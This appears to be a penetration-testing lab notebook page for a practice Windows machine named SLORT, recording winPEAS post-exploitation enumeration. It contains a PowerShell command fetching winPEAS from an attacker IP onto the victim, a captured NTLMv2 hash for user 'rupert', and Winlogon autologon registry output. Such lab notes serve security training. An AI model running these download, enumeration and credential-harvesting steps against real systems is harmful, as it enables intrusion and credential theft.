PEAS

Conducting an automated enumeration after performing a manual enumeration

PS C:\tmp> iwr -uri http://192.168.45.215/winPEASx64.exe -OutFile .\winPEASx64.exe

Delivery complete

Executing PEAS

ENV

����������͹ User Environment Variables
� Check for some passwords or keys in the env variables 
    COMPUTERNAME: SLORT
    PSExecutionPolicyPreference: Bypass
    HOMEPATH: \Users\rupert
    LOCALAPPDATA: C:\Users\rupert\AppData\Local
    PSModulePath: C:\Users\rupert\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
NDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Users\rupert\AppData\Local\Microsoft\WindowsApps;
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    LOGONSERVER: \\SLORT
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    HOMEDRIVE: C:
    SystemRoot: C:\WINDOWS
    SESSIONNAME: Console
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    USERPROFILE: C:\Users\rupert
    AP_PARENT_PID: 3952
    APPDATA: C:\Users\rupert\AppData\Roaming
    PROCESSOR_REVISION: 0101
    USERNAME: rupert
    CommonProgramW6432: C:\Program Files\Common Files
    OneDrive: C:\Users\rupert\OneDrive
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    USERDOMAIN_ROAMINGPROFILE: SLORT
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\WINDOWS\system32\cmd.exe
    PROMPT: $P$G
    SystemDrive: C:
    TEMP: C:\Users\rupert\AppData\Local\Temp
    ProgramFiles: C:\Program Files
    NUMBER_OF_PROCESSORS: 2
    TMP: C:\Users\rupert\AppData\Local\Temp
    ProgramData: C:\ProgramData
    ProgramW6432: C:\Program Files
    windir: C:\WINDOWS
    USERDOMAIN: SLORT
    PUBLIC: C:\Users\Public
 
����������͹ System Environment Variables
� Check for some passwords or keys in the env variables 
    ComSpec: C:\WINDOWS\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\WINDOWS\TEMP
    TMP: C:\WINDOWS\TEMP
    USERNAME: SYSTEM
    windir: C:\WINDOWS
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

LAPS

LSA Protection

Credentials Guard

Cached Creds

UAC

PowerShell

Drives

NTLM

rupert::SLORT:1122334455667788:7d1ebc58218e13eb4d2f5cd1d6ba0478:0101000000000000f8bd4db9b079db01d0dd54ac72100635000000000800300030000000000000000000000000200000dcc10470e9dcf983f60633fcd18ba02dcc4f68753c268a54974cb1d372a176ac0a00100000000000000000000000000000000000090000000000000000000000

`.NET`

Logged Users

RDP Sessions

AutoLogon

PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ    
    LegalNoticeText    REG_SZ    
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    LastLogOffEndTimePerfCounter    REG_QWORD    0x2458669bb
    ShutdownFlags    REG_DWORD    0x6
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    DESKTOP-QD02EHR
    DefaultUserName    REG_SZ    rupert
    DisableCad    REG_DWORD    0x1
    DisableLockWorkstation    REG_DWORD    0x0
    EnableFirstLogonAnimation    REG_DWORD    0x1
    AutoLogonSID    REG_SZ    S-1-5-21-2032240294-1210393520-1520670448-1002
    LastUsedUsername    REG_SZ    rupert
 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKey

InfoSec LAB

Explorer

Slort_Automated

PEAS

ENV

LAPS

LSA Protection

Credentials Guard

Cached Creds

UAC

PowerShell

Drives

NTLM

`.NET`

Logged Users

RDP Sessions

AutoLogon

Interesting Processes

Modifiable Services

Installed Programs

SMB

WSL

Interactive Graph View

Table of Contents

Backlinks